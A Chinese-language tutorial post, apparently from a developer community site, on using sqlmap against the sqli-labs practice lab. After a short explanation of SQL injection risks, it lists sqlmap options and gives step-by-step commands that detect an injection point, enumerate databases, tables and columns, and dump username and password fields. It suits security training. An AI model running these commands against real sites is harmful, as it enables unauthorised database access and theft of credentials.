kali-sqlmap使用技巧整理
原创
什么是sql注入?
SQL 注入是一种代码渗透技术,是最常用的网络黑客技术之一。
SQL 注入非常危险,可能会导致数据库中的数据被暴露,甚至被损坏。
sql注入的危害?
SQL 注入会带来很多危害,包括但不限于:
骗过登录校验,查看用户登录后的详细信息(例如发布的评论、购买的商品、邮寄地址等),
这是 SQL 注入的最简单形式;
更新、删除和插入记录,破坏数据库中的数据;
在服务器上执行命令,该命令可以下载和安装木马等恶意程序;
将有价值的用户数据(例如邮箱、密码、信用卡等)导出到攻击者的远程计算机测试地址: http://192.168.1.7/sqli-labs/Less-2/?id=2
sqlmap -h 获取帮助
sqlmap -u "url" 检测注入点
--dbs 列出所有数据库的名字
--current-db 列出当前数据库的名字
-D 指定一个数据库
--tables 列出表名
-T 指定表名
--columns 列出所有的字段名
-C 指定字段
--dump 列出字段内容sqlmap -h 获取帮助
sqlmap -h 获取帮助
在这里插入图片描述
检测注入点
sqlmap -u "url" 检测注入点
sqlmap -u "http://192.168.1.7/sqli-labs/Less-2/?id=2"
在这里插入图片描述
列出所有数据库的名字
sqlmap -u "http://192.168.1.7/sqli-labs/Less-2/?id=2" --dbs
在这里插入图片描述
列出当前数据库的名字
sqlmap -u "http://192.168.1.7/sqli-labs/Less-2/?id=2" --current-db
在这里插入图片描述
指定一个数据库列出表名
sqlmap -u "http://192.168.1.7/sqli-labs/Less-2/?id=2" -D "security" --tables
在这里插入图片描述
指定表名列出字段名
sqlmap -u "http://192.168.1.7/sqli-labs/Less-2/?id=2" -T users --columns
在这里插入图片描述
指定字段列出字段内容
sqlmap -u "http://192.168.1.7/sqli-labs/Less-2/?id=2" -D "security" -T "users" -C "username,password" --dump
在这里插入图片描述
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
数据库
云数据库为企业提供了完善的关系型数据库、非关系型数据库、分析型数据库和数据库生态工具。您可以通过产品选择和组合搭建,轻松实现高可靠、高可用性、高性能等数据库需求。云数据库服务也可大幅减少您的运维工作量,更专注于业务发展,让企业一站式享受数据上云及分布式架构的技术红利!
腾讯云开发者
